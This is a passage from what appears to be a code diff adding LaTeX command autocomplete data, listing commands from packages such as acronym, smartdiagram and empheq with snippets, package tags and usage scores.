'\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfplotstable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfplotstable-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfplotstable-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfplotstable-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfplotstable-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfplotstable-cmd', + score: 0.2864294797053033, + }, + ], + acronym: [ + { + caption: '\\acp{}', + snippet: '\\acp{$1}', + meta: 'acronym-cmd', + score: 0.0005185177930914685, + }, + { + caption: '\\acsfont{}', + snippet: '\\acsfont{$1}', + meta: 'acronym-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\aclabelfont', + snippet: '\\aclabelfont', + meta: 'acronym-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\acro{}{}', + snippet: '\\acro{$1}{$2}', + meta: 'acronym-cmd', + score: 0.023587207425038587, + }, + { + caption: '\\acl{}', + snippet: '\\acl{$1}', + meta: 'acronym-cmd', + score: 0.0008131607751426444, + }, + { + caption: '\\acf{}', + snippet: '\\acf{$1}', + meta: 'acronym-cmd', + score: 0.0006845634165950408, + }, + { + caption: '\\acrodef{}[]{}', + snippet: '\\acrodef{$1}[$2]{$3}', + meta: 'acronym-cmd', + score: 0.0002902047200830372, + }, + { + caption: '\\acs{}', + snippet: '\\acs{$1}', + meta: 'acronym-cmd', + score: 0.002351209826598939, + }, + { + caption: '\\acfp{}', + snippet: '\\acfp{$1}', + meta: 'acronym-cmd', + score: 2.2013599341265054e-5, + }, + { + caption: '\\ac{}', + snippet: '\\ac{$1}', + meta: 'acronym-cmd', + score: 0.04714113215364704, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'acronym-cmd', + score: 0.03789745970461662, + }, + ], + nicefrac: [ + { + caption: '\\nicefrac{}{}', + snippet: '\\nicefrac{$1}{$2}', + meta: 'nicefrac-cmd', + score: 0.0018011350423659288, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nicefrac-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nicefrac-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nicefrac-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nicefrac-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nicefrac-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nicefrac-cmd', + score: 0.0018957469739775527, + }, + ], + smartdiagram: [ + { + caption: '\\usesmartdiagramlibrary{}', + snippet: '\\usesmartdiagramlibrary{$1}', + meta: 'smartdiagram-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'smartdiagram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'smartdiagram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'smartdiagram-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'smartdiagram-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'smartdiagram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'smartdiagram-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'smartdiagram-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'smartdiagram-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'smartdiagram-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'smartdiagram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'smartdiagram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'smartdiagram-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'smartdiagram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'smartdiagram-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'smartdiagram-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'smartdiagram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'smartdiagram-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'smartdiagram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'smartdiagram-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'smartdiagram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'smartdiagram-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'smartdiagram-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'smartdiagram-cmd', + score: 0.2864294797053033, + }, + ], + qtree: [ + { + caption: '\\qroof{}', + snippet: '\\qroof{$1}', + meta: 'qtree-cmd', + score: 0.00012663929287995903, + }, + { + caption: '\\Tree[]', + snippet: '\\Tree[$1]', + meta: 'qtree-cmd', + score: 0.0008894716589418522, + }, + { + caption: '\\Tree', + snippet: '\\Tree', + meta: 'qtree-cmd', + score: 0.0008894716589418522, + }, + ], + backref: [ + { + caption: '\\backrefpagesname', + snippet: '\\backrefpagesname', + meta: 'backref-cmd', + score: 0.0022756001200686213, + }, + { + caption: '\\backref', + snippet: '\\backref', + meta: 'backref-cmd', + score: 0.0025820187198826706, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'backref-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'backref-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'backref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'backref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'backref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'backref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'backref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'backref-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'backref-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'backref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'backref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'backref-cmd', + score: 0.008565354665444157, + }, + ], + epigraph: [ + { + caption: '\\epigraphflush{}', + snippet: '\\epigraphflush{$1}', + meta: 'epigraph-cmd', + score: 1.8073688234300064e-5, + }, + { + caption: '\\epigraphsize{}', + snippet: '\\epigraphsize{$1}', + meta: 'epigraph-cmd', + score: 6.820709322498027e-5, + }, + { + caption: '\\epigraphsize', + snippet: '\\epigraphsize', + meta: 'epigraph-cmd', + score: 6.820709322498027e-5, + }, + { + caption: '\\epigraph{}{}', + snippet: '\\epigraph{$1}{$2}', + meta: 'epigraph-cmd', + score: 0.0031428856022970054, + }, + ], + chngcntr: [ + { + caption: '\\counterwithin{}{}', + snippet: '\\counterwithin{$1}{$2}', + meta: 'chngcntr-cmd', + score: 0.001287401394784382, + }, + { + caption: '\\counterwithout{}{}', + snippet: '\\counterwithout{$1}{$2}', + meta: 'chngcntr-cmd', + score: 0.0026127666246546326, + }, + ], + empheq: [ + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'empheq-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'empheq-cmd', + score: 1.897791904799601, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'empheq-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'empheq-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'empheq-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'empheq-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'empheq-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'empheq-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'empheq-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'empheq-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'empheq-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'empheq-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'empheq-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'empheq-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'empheq-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'empheq-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'empheq-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'empheq-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'empheq-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'empheq-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'empheq-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'empheq-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'empheq-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'empheq-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'empheq-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'empheq-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'empheq-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'empheq-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'empheq-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'empheq-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'empheq-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'empheq-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'empheq-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'empheq-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'empheq-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'empheq-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'empheq-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'empheq-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'empheq-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'empheq-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'empheq-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'empheq-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'empheq-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'empheq-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'empheq-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'empheq-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'empheq-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'empheq-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'empheq-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'empheq-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'empheq-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'empheq-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'empheq-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'empheq-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'empheq-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'empheq-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'empheq-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'empheq-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'empheq-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'empheq-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'empheq-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'empheq-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'empheq-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'empheq-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'empheq-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'empheq-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'empheq-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'empheq-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'empheq-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'empheq-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'empheq-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'empheq-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'empheq-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'empheq-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'empheq-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'empheq-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'empheq-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'empheq-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'empheq-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'empheq-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'empheq-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'empheq-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'empheq-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'empheq-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'empheq-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'empheq-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'empheq-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'empheq-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'empheq-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'empheq-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'empheq-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'empheq-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'empheq-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'empheq-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'empheq-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'empheq-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'empheq-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'empheq-cmd', + score: 0.013010882180364367, + 